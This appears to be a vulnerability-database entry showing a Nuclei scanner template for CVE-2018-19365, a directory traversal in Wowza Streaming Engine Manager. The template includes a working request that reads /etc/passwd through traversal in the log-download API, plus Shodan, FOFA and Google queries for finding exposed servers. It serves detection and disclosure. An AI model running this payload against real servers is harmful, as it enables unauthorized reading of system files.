Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2018-19365
HistoryFeb 28, 2022 - 1:13 p.m.

Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal

2022-02-2813:13:59
ProjectDiscovery
github.com
17
wowza streaming engine manager directory traversal cve2018 lfi unauthorized access security vulnerability disclosure sensitive information

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

AI Score

9.2

Confidence

High

EPSS

0.014

Percentile

86.5%

Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.

id: CVE-2018-19365

info:
  name: Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
  author: 0x_Akoko
  severity: critical
  description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.
  remediation: |
    Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.
  reference:
    - https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19365
    - https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2018-19365
    cwe-id: CWE-22
    epss-score: 0.01354
    epss-percentile: 0.8589
    cpe: cpe:2.3:a:wowza:streaming_engine:4.7.4.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: wowza
    product: streaming_engine
    shodan-query:
      - http.title:"manager" product:"wowza streaming engine"
      - cpe:"cpe:2.3:a:wowza:streaming_engine"
    fofa-query: title="manager" product:"wowza streaming engine"
    google-query: intitle:"manager" product:"wowza streaming engine"
  tags: cve2018,cve,wowza,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022065a911e4817469f0fbb48b8f3f0364ed15260bc4b970a52c536ea3b0b7d172a8022100d616870d8e78df9250965cdffbc0fc0773d1a7e7445ad7e44e713526627905bc:922c64590222798bb761d5b6d8e72950

CVSS2

6.4

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:N/A:P

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

AI Score

9.2

Confidence

High

EPSS

0.014

Percentile

86.5%

Related for NUCLEI:CVE-2018-19365